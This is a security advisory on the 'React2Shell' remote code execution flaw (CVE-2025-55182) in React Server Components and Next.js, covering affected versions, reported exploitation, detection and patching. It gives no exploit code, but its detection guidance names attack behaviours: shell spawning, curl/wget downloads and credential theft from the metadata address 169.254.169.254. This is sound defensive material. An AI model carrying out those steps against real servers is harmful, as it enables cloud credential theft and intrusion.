React2Shell: Critical 10.0 CVSS RCE Hits React & Next.js, Actively Exploited!
Critical 'React2Shell' RCE (CVE-2025-55182) in React Server Components Under Active Exploitation
Related Entities
Threat Actors
Organizations
Products & Tech
CVE Identifiers
Full Report
Executive Summary
A critical, unauthenticated remote code execution (RCE) vulnerability, CVE-2025-55182, has been disclosed in React Server Components (RSC), affecting dependent frameworks like Next.js. Nicknamed 'React2Shell,' the flaw carries a CVSS 10.0 'Critical' severity rating and allows an attacker to execute arbitrary code on the server with no authentication. The vulnerability is being actively exploited in the wild for post-exploitation activities including cloud credential theft and cryptomining. Due to the widespread use of these frameworks and the ease of exploitation, all organizations using affected versions of React or Next.js must upgrade to patched versions immediately. Web Application Firewall (WAF) rules offer temporary protection but are not a substitute for patching.
Vulnerability Details
CVE-2025-55182 is a logical deserialization vulnerability in the way React Server Components process RSC payloads, also known as the "Flight" protocol. An unauthenticated attacker can send a specially crafted HTTP POST request to any Server Function endpoint on a vulnerable application. The server-side React library unsafely deserializes this malicious payload, leading to arbitrary JavaScript code execution in the context of the running Node.js process.
Crucially, applications are vulnerable even if they do not explicitly define any Server Function endpoints, as the underlying RSC mechanism is still present and exploitable in affected versions. This significantly widens the attack surface.
Affected Systems
The vulnerability impacts a range of popular web development tools and frameworks. Key affected products include:
- React Server Components: versions 19.0.0, 19.1.0, 19.1.1, 19.2.0
- Next.js: versions 15.x and 16.x that use the App Router
react-server-dom-parcelreact-server-dom-turbopackreact-server-dom-webpack
According to Wiz, an estimated 39% of cloud environments contain vulnerable instances of these frameworks, highlighting the massive potential impact.
Exploitation Status
Active, in-the-wild exploitation of CVE-2025-55182 was observed by multiple security firms, including Amazon and Wiz, within hours of its public disclosure on December 3, 2025. Attackers, including groups identified as Earth Lamia and Jackpot Panda, are scanning for and exploiting vulnerable servers. Observed post-exploitation activities include:
- Probing for cloud environment metadata services to steal credentials.
- Deploying cryptocurrency mining malware.
Impact Assessment
Successful exploitation of 'React2Shell' grants an attacker full control over the web server. The business impact is severe and can include:
- Complete System Compromise: Attackers can read, modify, or delete any data on the server, install backdoors, and maintain persistence.
- Cloud Account Takeover: If the server is hosted in a cloud environment (e.g., AWS, GCP, Azure), attackers can steal instance metadata credentials, potentially gaining access to the entire cloud account and its associated resources.
- Data Breach: Sensitive application data, user information, and intellectual property can be exfiltrated.
- Financial Loss: Attackers can deploy resource-intensive malware like cryptominers, leading to significant increases in cloud computing bills.
Cyber Observables for Detection
Security teams should hunt for exploitation attempts by monitoring web server logs for suspicious requests.
| Type | Value | Description |
|---|---|---|
| url_pattern | Any Server Function endpoint | Monitor HTTP POST requests to any endpoint that handles React Server Components. |
| network_traffic_pattern | Outbound connections from Node.js process to cloud metadata services | A node process trying to access 169.254.169.254 is a strong indicator of compromise. |
| process_name | node spawning unexpected child processes |
Look for the Node.js process spawning shells (/bin/sh, cmd.exe) or downloading tools like curl and wget. |
Detection & Response
- WAF Deployment: Immediately enable WAF rules provided by cloud vendors like Cloudflare, AWS, Akamai, and Google Cloud. These rules are designed to block known exploit patterns for CVE-2025-55182. This is a form of
D3-ITF: Inbound Traffic Filtering. - Log Analysis: Proactively hunt through web server and WAF logs for HTTP POST requests containing unusual or obfuscated payloads directed at RSC endpoints. Correlate these with any anomalous outbound network connections from your web servers.
- Endpoint Monitoring: Use EDR or similar tools on servers to detect if the
nodeprocess spawns suspicious child processes or makes connections to unexpected external IP addresses or internal metadata services.
Remediation Steps
WAF rules are a temporary stopgap, not a permanent solution. Patching is the only definitive remediation.
- Upgrade Immediately: Developers must upgrade all affected applications to a patched version of the relevant library (e.g., Next.js, React). Refer to the official security advisories from React and Vercel for specific patched versions. This aligns with MITRE Mitigation
M1051 - Update Software. - Vulnerability Scanning: Run software composition analysis (SCA) or vulnerability scanners to identify all instances of vulnerable libraries across your environment, including in development and testing pipelines.
- Network Segmentation: As a compensating control, restrict outbound network access from web servers to only essential services. Block access to cloud metadata endpoints (
169.254.169.254) if not explicitly required by the application. This is an application ofM1030 - Network Segmentation.
Timeline of Events
MITRE ATT&CK Mitigations
Update Software
Upgrading to a patched version of React and Next.js is the only definitive way to remediate the vulnerability.
Mapped D3FEND Techniques:
Network Intrusion Prevention
Deploying updated WAF rules from cloud providers can block known exploitation patterns as a temporary mitigation.
Running the application in a container with minimal privileges and strict network egress rules can limit the impact of a successful compromise.
Mapped D3FEND Techniques:
D3FEND Defensive Countermeasures
The highest priority action is to immediately update all applications using React Server Components or Next.js to the latest patched versions. This is not just a recommendation; it is a critical requirement given the 10.0 CVSS score and active exploitation. Use a Software Composition Analysis (SCA) tool to scan your entire codebase, including all dependencies, to identify every instance of the vulnerable libraries. Update your package.json files to specify the secure versions, delete node_modules and lock files (package-lock.json, yarn.lock), and run npm install or yarn install to ensure a clean build. Deploy the patched application to all environments, from development to production, as quickly as possible. This is the only way to fully close the CVE-2025-55182 attack vector.
As an immediate, temporary mitigation while patching is underway, deploy and enable the specific WAF rules released by your cloud or security provider (AWS, Cloudflare, Akamai, etc.) designed to detect and block 'React2Shell' exploits. These rules inspect incoming HTTP POST requests for the malicious deserialization patterns associated with CVE-2025-55182. It is crucial to set these rules to 'Block' mode, not just 'Alert'. While effective against known public exploits, sophisticated attackers may find ways to bypass these signatures. Therefore, WAF rules should be seen as a critical but temporary shield, not a permanent solution. The focus must remain on applying the software patches.
To limit the impact of a potential compromise, enforce strict egress filtering on the security groups or firewalls protecting your Next.js and React servers. Since a primary post-exploitation goal is stealing cloud credentials, explicitly deny all outbound traffic from the server to the cloud metadata IP address (169.254.169.254) unless the application has a legitimate and documented need for it. Furthermore, adopt a default-deny posture for all outbound traffic, only allowing connections to known, required endpoints (e.g., specific database servers, external APIs). This can prevent a compromised server from establishing a C2 connection or exfiltrating data, effectively containing the breach.
Sources & References
Article Author
Jason Gomes
• Cybersecurity PractitionerCybersecurity professional with over 10 years of specialized experience in security operations, threat intelligence, incident response, and security automation. Expertise spans SOAR/XSOAR orchestration, threat intelligence platforms, SIEM/UEBA analytics, and building cyber fusion centers. Background includes technical enablement, solution architecture for enterprise and government clients, and implementing security automation workflows across IR, TIP, and SOC use cases.
Tags
📢 Share This Article
Help others stay informed about cybersecurity threats